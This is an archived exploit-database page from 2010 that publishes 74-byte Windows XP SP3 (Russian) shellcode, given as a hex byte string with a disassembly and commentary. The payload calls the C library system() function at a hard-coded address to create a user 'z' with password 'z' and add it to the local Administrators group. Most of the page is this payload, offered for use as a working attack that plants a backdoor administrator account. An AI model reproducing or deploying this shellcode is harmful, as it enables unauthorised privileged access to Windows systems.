[win32] - win32/xp sp3 (ru) add local administrator in 74 by
Posted on 16 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>win32/xp sp3 (ru) add local administrator in 74 bytes | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='win32/xp sp3 (ru) add local administrator in 74 bytes by lord Kelvin in win32 | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===================================================== win32/xp sp3 (ru) add local administrator in 74 bytes ===================================================== win32/xp sp3 (ru) add local administrator in 74 bytes "xEBx08xB8xC7x93xC1x77xFFxD0xCCxE8xF3xFFxFFxFFcmd /cnet/add user z z&net/add localgroup Administrators z" At first we jump to make call push address of our command-string in stack and then execute it with system() function. You'd better check its address on your machine, before running. BP is used to prevent infinite looping. The command is slightly optimized, to save something near 10 bytes od space. The result - you get z:z user with Administrative priveleges. The last zero byte is essential. xxx: EB 08 jmp xxx+0A ; the magic begins xxx+02: B8 C793C177 mov eax,77C193C7 ; call msvcrt.system FF D0 call eax ; / CC int 3 ; pause ;) xxx+0A: E8 F3FFFFFF call xxx+02 ; push xxx+0F xxx+0F: db 'cmd /cnet/add user z z&net/add localgroup Administrators z',0 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-16]</pre></body></html>
